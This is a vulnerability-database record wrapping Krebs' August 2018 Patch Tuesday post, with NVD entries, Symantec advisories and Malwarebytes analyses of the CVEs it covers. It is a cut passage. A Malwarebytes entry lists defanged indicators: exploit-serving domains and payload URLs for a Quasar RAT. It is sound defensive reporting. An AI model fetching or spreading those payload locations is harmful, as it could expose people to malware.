{"id": "KREBS:72DFB7C4ADFA38C01CEC9D2F783FF30A", "type": "krebs", "bulletinFamily": "blog", "title": "Patch Tuesday, August 2018 Edition", "description": "**Adobe **and **Microsoft** each released security updates for their software on Tuesday. Adobe plugged five security holes in its **Flash Player** browser plugin. Microsoft pushed 17 updates to fix at least 60 vulnerabilities in Windows and other software, including two \"[zero-day](<https://en.wikipedia.org/wiki/Zero-day_\\(computing\\)>)\" flaws that attackers were already exploiting before Microsoft issued patches to fix them.\n\nAccording to security firm **Ivanti**, the first of the two zero-day flaws ([CVE-2018-8373](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373>)) is a critical flaw in **Internet Explorer** that attackers could use to foist malware on IE users who browse to hacked or booby-trapped sites. The other zero-day is a bug ([CVE-2018-8414](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8414>)) in the Windows 10 shell that could allow an attacker to run code of his choice.\n\nMicrosoft also patched more variants of the [Meltdown/Spectre memory vulnerabilities](<https://krebsonsecurity.com/2018/01/scary-chip-flaws-raise-spectre-of-meltdown/>), collectively dubbed \"[Foreshadow](<https://foreshadowattack.eu/>)\" by a team of researchers who discovered and reported the **Intel**-based flaws. For more information about how Foreshadow works, check out their [academic paper](<https://foreshadowattack.eu/foreshadow.pdf>) (PDF), and/or the video below. Microsoft's analysis is [here](<https://blogs.technet.microsoft.com/srd/2018/08/10/analysis-and-mitigation-of-l1-terminal-fault-l1tf/>).\n\nOne nifty little bug fixed in this patch batch is [CVE-2018-8345](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8345>). It addresses a problem in the way Windows handles shortcut files; ending in the \u201c.lnk\u201d extension, shortcut files are Windows components that link (hence the \u201clnk\u201d extension) easy-to-recognize icons to specific executable programs, and are typically placed on the user\u2019s Desktop or Start Menu.\n\nThat description of a shortcut file was taken verbatim from the [first widely read report](<https://krebsonsecurity.com/2010/07/experts-warn-of-new-windows-shortcut-flaw/>) on what would later be dubbed the [Stuxnet worm](<https://en.wikipedia.org/wiki/Stuxnet>), which also employed an exploit for a weakness in the way Windows handled shortcut (.lnk) files. According to security firm [Qualys](<https://blog.qualys.com/laws-of-vulnerabilities/2018/08/14/august-patch-tuesday-63-vulns-l1tf-exchange-sql-active-attacks-on-ie-flaw>), this patch should be prioritized for both workstations and servers, as the user does not need to click the file to exploit. \"Simply viewing a malicious LNK file can execute code as the logged-in user,\" Qualys' **Jimmy Graham** wrote.\n\nNot infrequently, Redmond ships updates that end up causing stability issues for some users, and it doesn\u2019t hurt to wait a day or two before seeing if any major problems are reported with new updates before installing them. Microsoft doesn\u2019t make it easy for Windows 10 users to change this setting, but it is possible. For all other Windows OS users, if you\u2019d rather be alerted to new updates when they\u2019re available so you can choose when to install them, there\u2019s a setting for that in Windows Update.\n\nIt\u2019s a good idea to get in the habit of backing up your computer before applying monthly updates from Microsoft. Windows has some built-in tools that can help recover from bad patches, but restoring the system to a backup image taken just before installing updates is often much less hassle and an added peace of mind while you\u2019re sitting there praying for the machine to reboot successfully after patching.\n\nAdobe's Flash update brings the program to [_v. 30.0.0.154_](<https://helpx.adobe.com/security/products/flash-player/apsb18-25.html>) for Windows,** macOS**, **Chrome** and **Linux**. Most readers here know how I feel about Flash, which is a major security liability and a frequent target of browser-based attacks. The updates from Microsoft include these Flash fixes for IE, and **Google Chrome** has already pushed an update to address these five Flash flaws (although a browser restart may be needed).\n\nBut seriously, if you don't have a specific need for Flash, just disable it already. Chrome is set to ask before playing Flash objects, but disabling Flash in Chrome is simple enough. Paste \u201cchrome://settings/content\u201d into a Chrome browser bar and then select \u201cFlash\u201d from the list of items. By default it should be set to \u201cAsk first\u201d before running Flash, although users also can disable Flash entirely here or whitelist and blacklist specific sites.\n\nBy default, Mozilla Firefox on Windows computers with Flash installed runs Flash in a \u201cprotected mode,\u201d which prompts the user to decide if they want to enable the plugin before Flash content runs on a Web site.\n\nAdobe also released [security updates](<https://helpx.adobe.com/security/products/acrobat/apsb18-29.html>) for its PDF Reader and Acrobat products.\n\nAs always, please leave a note in the comments below if you experience any problems installing any of these updates.", "published": "2018-08-15T14:52:21", "modified": "2018-08-15T14:52:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://krebsonsecurity.com/2018/08/patch-tuesday-august-2018-edition/", "reporter": "BrianKrebs", "references": [], "cvelist": ["CVE-2018-8345", "CVE-2018-8373", "CVE-2018-8414"], "lastseen": "2018-08-15T17:18:45", "viewCount": 17, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2018-08-15T17:18:45", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-8373", "CVE-2018-8345", "CVE-2018-8414"]}, {"type": "symantec", "idList": ["SMNTC-105037", "SMNTC-105027", "SMNTC-105016"]}, {"type": "attackerkb", "idList": ["AKB:D2380257-7D97-4A85-961C-A25C70361E50"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:C7D9126F912DAC06B9FBA1B29BF174BC", "MALWAREBYTES:37E5B8085C06BEB2C5CED2D9549F29CB"]}, {"type": "thn", "idList": ["THN:F033FC8698702175A4736D089C3C9D13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994507", "MYHACK58:62201996031", "MYHACK58:62201891201", "MYHACK58:62201994516"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:86F4EEA0E7CEE93E9EA6A2FB3C2315F0"]}, {"type": "securelist", "idList": ["SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C"]}, {"type": "zdi", "idList": ["ZDI-18-942", "ZDI-18-953"]}, {"type": "threatpost", "idList": ["THREATPOST:F6D26AE5EBA39346A2B00CE4C6470A88", "THREATPOST:961233DDAF80602C2DDEC2B819294F05"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:7105AC02468FA173C8BDB7936612EE77"]}, {"type": "mskb", "idList": ["KB4340939"]}, {"type": "kaspersky", "idList": ["KLA11306", "KLA11789", "KLA11309"]}, {"type": "nessus", "idList": ["SMB_NT_MS18_AUG_INTERNET_EXPLORER.NASL", "SMB_NT_MS18_AUG_4343887.NASL", "SMB_NT_MS18_AUG_4343897.NASL", "SMB_NT_MS18_AUG_WIN2008.NASL", "SMB_NT_MS18_AUG_4343900.NASL", "SMB_NT_MS18_AUG_4343898.NASL", "SMB_NT_MS18_AUG_4343909.NASL", "SMB_NT_MS18_AUG_4343885.NASL", "SMB_NT_MS18_AUG_4343892.NASL", "SMB_NT_MS18_AUG_4343901.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310813846", "OPENVAS:1361412562310813841", "OPENVAS:1361412562310813842", "OPENVAS:1361412562310813844", "OPENVAS:1361412562310813843", "OPENVAS:1361412562310813845", "OPENVAS:1361412562310813840"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A9E55A97439608C62C1BF62669B8074A"]}], "modified": "2018-08-15T17:18:45", "rev": 2}, "vulnersScore": 6.4}}

{"cve": [{"lastseen": "2021-02-02T06:52:43", "description": "A remote code execution vulnerability exists when the Windows Shell does not properly validate file paths, aka \"Windows Shell Remote Code Execution Vulnerability.\" This affects Windows 10 Servers, Windows 10.", "edition": 4, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", "title": "CVE-2018-8414", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8414"], "modified": "2018-10-12T19:47:00", "cpe": ["cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server:1709", "cpe:/o:microsoft:windows_server:1803", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_10:1709"], "id": "CVE-2018-8414", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-8414", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:42", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka \"Scripting Engine Memory Corruption Vulnerability.\" This affects Internet Explorer 9, Internet Explorer 11, Internet Explorer 10. This CVE ID is unique from CVE-2018-8353, CVE-2018-8355, CVE-2018-8359, CVE-2018-8371, CVE-2018-8372, CVE-2018-8385, CVE-2018-8389, CVE-2018-8390.", "edition": 5, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", "title": "CVE-2018-8373", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8373"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:microsoft:internet_explorer:10", "cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:internet_explorer:9"], "id": "CVE-2018-8373", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-8373", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:42", "description": "A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed, aka \"LNK Remote Code Execution Vulnerability.\" This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8346.", "edition": 4, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", "title": "CVE-2018-8345", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8345"], "modified": "2018-09-07T15:37:00", "cpe": ["cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2016:1709", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2018-8345", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-8345", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:itanium:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:itanium:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}], "symantec": [{"lastseen": "2018-08-15T00:15:16", "bulletinFamily": "software", "cvelist": ["CVE-2018-8414"], "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2018-08-14T00:00:00", "published": "2018-08-14T00:00:00", "id": "SMNTC-105016", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/105016", "type": "symantec", "title": "Microsoft Windows Shell CVE-2018-8414 Remote Code Execution Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-15T02:14:38", "bulletinFamily": "software", "cvelist": ["CVE-2018-8373"], "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted web page. Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the affected application.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2018-08-14T00:00:00", "published": "2018-08-14T00:00:00", "id": "SMNTC-105037", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/105037", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2018-8373 Remote Memory Corruption Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-15T00:15:18", "bulletinFamily": "software", "cvelist": ["CVE-2018-8345"], "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks may cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 1709 \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2018-08-14T00:00:00", "published": "2018-08-14T00:00:00", "id": "SMNTC-105027", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/105027", "type": "symantec", "title": "Microsoft Windows LNK CVE-2018-8345 Remote Code Execution Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}], "attackerkb": [{"lastseen": "2020-11-22T03:08:33", "bulletinFamily": "info", "cvelist": ["CVE-2018-8353", "CVE-2018-8355", "CVE-2018-8359", "CVE-2018-8371", "CVE-2018-8372", "CVE-2018-8373", "CVE-2018-8385", "CVE-2018-8389", "CVE-2018-8390"], "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka \u201cScripting Engine Memory Corruption Vulnerability.\u201d This affects Internet Explorer 9, Internet Explorer 11, Internet Explorer 10. This CVE ID is unique from CVE-2018-8353, CVE-2018-8355, CVE-2018-8359, CVE-2018-8371, CVE-2018-8372, CVE-2018-8385, CVE-2018-8389, CVE-2018-8390.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 2:58am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n", "modified": "2020-07-24T00:00:00", "published": "2018-08-15T00:00:00", "id": "AKB:D2380257-7D97-4A85-961C-A25C70361E50", "href": "https://attackerkb.com/topics/4b1HB0oydp/cve-2018-8373", "type": "attackerkb", "title": "CVE-2018-8373", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2018-09-26T20:08:16", "bulletinFamily": "blog", "cvelist": ["CVE-2018-8174", "CVE-2018-8373"], "description": "A variant of a remote code execution vulnerability with Internet Explorer's scripting engine known as CVE-2018-8373 [patched last August](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373>) has been found in the wild. Looking at the IOCs [posted by our colleagues at TrendMicro](<https://blog.trendmicro.com/trendlabs-security-intelligence/new-cve-2018-8373-exploit-spotted-in-the-wild/>), we recognized the infrastructure serving this exploit. The same static domain has been active [since at least early July](<https://www.virustotal.com/en/domain/www.myswcd.com/information/>), and is being redirected to from an adult website injected with a malicious script.\n\nIn the below traffic capture from August, we were served [CVE-2018-8174](<https://blog.malwarebytes.com/threat-analysis/2018/05/internet-explorer-zero-day-browser-attack/>), which is [thought](<https://blog.trendmicro.com/trendlabs-security-intelligence/use-after-free-uaf-vulnerability-cve-2018-8373-in-vbscript-engine-affects-internet-explorer-to-run-shellcode/>) to be from the same author. It is interesting to note that this is not an exploit kit, but rather appears to be a single actor who implemented the available Proof of Concept to distribute his payload, the Quasar Remote Administration Tool (RAT).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/09/traffic_08.png> \"\" )\n\nDuring our tests with this new variant of CVE-2018-8373, we found it to be quite unstable and failing to detonate its payload via Powershell invocation. However, a working CVE-2018-8174 was still serving the same payload we had captured back in August.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/09/error.png> \"\" )\n\nThe source code for CVE-2018-8373 has been uploaded to many platforms already ([PasteBin](<https://pastebin.com/W4aVvPVX>), [VirusTotal](<https://www.virustotal.com/#/file/96bdf283db022ca1729bbde82976c79d289ec5e66c799b3816275e62e422eb50/detection>)), including to the [AnyRun](<https://app.any.run/tasks/d7ae8ea4-9767-44de-9784-b5cdb4ee1756>) sandbox. That sample triggers the exploit and spawns PowerShell. In the following animation, we replayed this attack to show how our [anti-exploit technology](<https://www.malwarebytes.com/business/endpointprotectionandresponse/>) is able to mitigate this vulnerability at various levels.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/09/CVE-2018-8373.gif> \"\" )\n\nWe can expect that other treat actors will be looking at this code for possible implementation. However, unless it is improved, it is unlikely to be integrated into exploit kits, considering that its cousin, CVE-2018-8174, works flawlessly.\n\n### Indicators of compromise\n\nInjected adult site\n \n \n 198.211.33[.]67\n clubtubes[.]com\n\nExploit-serving domain\n \n \n 54.191.17[.]130\n myswcd[.]com/vol/m3.html,CVE-2018-8373\n myswcd[.]com/vol/m2.html,CVE-2018-8174\n myswcd[.]com/vol/me.html,CVE-2018-8174\n\nPayload\n \n \n myswcd[.]com/vol/s1.exe,Loader\n myswcd[.]com/vol/v1.exe,Installer\n myswcd[.]com/vol/v2.exe,Quasar RAT\n 7EEF6EF8FED53B7C3BF61BA821F375A0A433EA4CB0185FD223780B729A9A5792\n 268909BC33F0F8C5312B51570016311E3676AF651A57DE38E42241DCC177B2D6\n D9A967D0CAA8DB86FECA3AE469EF6797E81DFDAC4D8531658CB242A87C80CE05\n\nThe post [Buggy implementation of CVE-2018-8373 vulnerability used to deliver Quasar RAT](<https://blog.malwarebytes.com/threat-analysis/2018/09/buggy-implementation-of-cve-2018-8373-used-to-deliver-quasar-rat/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2018-09-26T17:13:26", "published": "2018-09-26T17:13:26", "id": "MALWAREBYTES:C7D9126F912DAC06B9FBA1B29BF174BC", "href": "https://blog.malwarebytes.com/threat-analysis/2018/09/buggy-implementation-of-cve-2018-8373-used-to-deliver-quasar-rat/", "type": "malwarebytes", "title": "Buggy implementation of CVE-2018-8373 vulnerability used to deliver Quasar RAT", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-12T08:23:05", "bulletinFamily": "blog", "cvelist": ["CVE-2018-17780", "CVE-2018-8373"], "description": "Last week on Labs was a busy one. We discussed how [SMS phishing attacks target the job market](<https://blog.malwarebytes.com/cybercrime/2018/09/mobile-menace-monday-sms-phishing-attacks-target-the-job-market/>), issued a warning for [TV Licensing phishes](<https://blog.malwarebytes.com/cybercrime/2018/09/100-channels-and-nothing-on-except-tv-licensing-phishes/>), commented on how Apple confused Safari users with recent [changes to how OSX handles browser extensions](<https://blog.malwarebytes.com/security-world/2018/09/safari-users-where-did-your-extensions-go/>), and elaborated on [holes found in Mojave\u2019s privacy protection](<https://blog.malwarebytes.com/security-world/privacy-security-world/2018/09/holes-found-in-mojaves-privacy-protection/>)\u2014deep breath! We also showed how a [buggy implementation of CVE-2018-8373 vulnerability is used to deliver Quasar RAT](<https://blog.malwarebytes.com/threat-analysis/2018/09/buggy-implementation-of-cve-2018-8373-used-to-deliver-quasar-rat/>), discussed what is needed to [fight back in the age of unwanted calls](<https://blog.malwarebytes.com/101/2018/09/phone-spampocalypse-fighting-back-in-the-age-of-unwanted-calls/>), gave some tips on [how to protect your data from Magecart and other e-commerce attacks](<https://blog.malwarebytes.com/cybercrime/2018/09/how-to-protect-your-data-from-magecart-and-other-e-commerce-attacks/>), and alerted our readers that [millions of accounts were affected in the latest Facebook vulnerability](<https://blog.malwarebytes.com/cybercrime/2018/09/millions-of-accounts-affected-in-latest-facebook-hack/>).\n\n### Other cybersecurity news:\n\n * [Tech firms back US privacy law](<https://www.washingtonpost.com/business/technology/the-latest-amazon-exec-warns-of-calif-privacy-approach/2018/09/26/ddb79270-c19d-11e8-9451-e878f96be19b_story.html?utm_term=.a40d184e1211>) to negate states. (Source: The Washington Post)\n * [Microsoft](<https://www.bleepingcomputer.com/news/security/microsoft-rolls-out-confidential-computing-for-azure/>) rolls out confidential computing for Azure. (Source: Bleeping Computer)\n * [Google](<https://www.blog.google/products/chrome/product-updates-based-your-feedback/>) recently made a change to simplify the way Chrome handles sign-in. (Source: The Keyword)\n * [VirusTotal](<https://medium.com/chronicle-blog/introducing-virustotal-enterprise-3a1607d79334>) announces VirusTotal Enterprise. (Source: medium.com)\n * [14 years imprisonment](<https://hotforsecurity.bitdefender.com/blog/14-years-prison-for-man-who-helped-hackers-evade-detection-by-anti-virus-software-20363.html>) for man who helped hackers evade detection by antivirus software. (Source: Hot for Security)\n * [Port of San Diego's](<https://www.portofsandiego.org/press-releases/general-press-releases/port-san-diego-927-update-cybersecurity-incident>) information technology systems disrupted by ransomware. (Source: Port of San Diego)\n * [LoJax](<https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/>): the first UEFI rootkit found in the wild, courtesy of the Sednit group. (Source: WeLiveSecurity}\n * [Telegram](<https://www.inputzero.io/2018/09/bug-bounty-telegram-cve-2018-17780.html>) leaks public/private IP addresses of end users in desktop. (Source: inputzero)\n * [iPhone XS 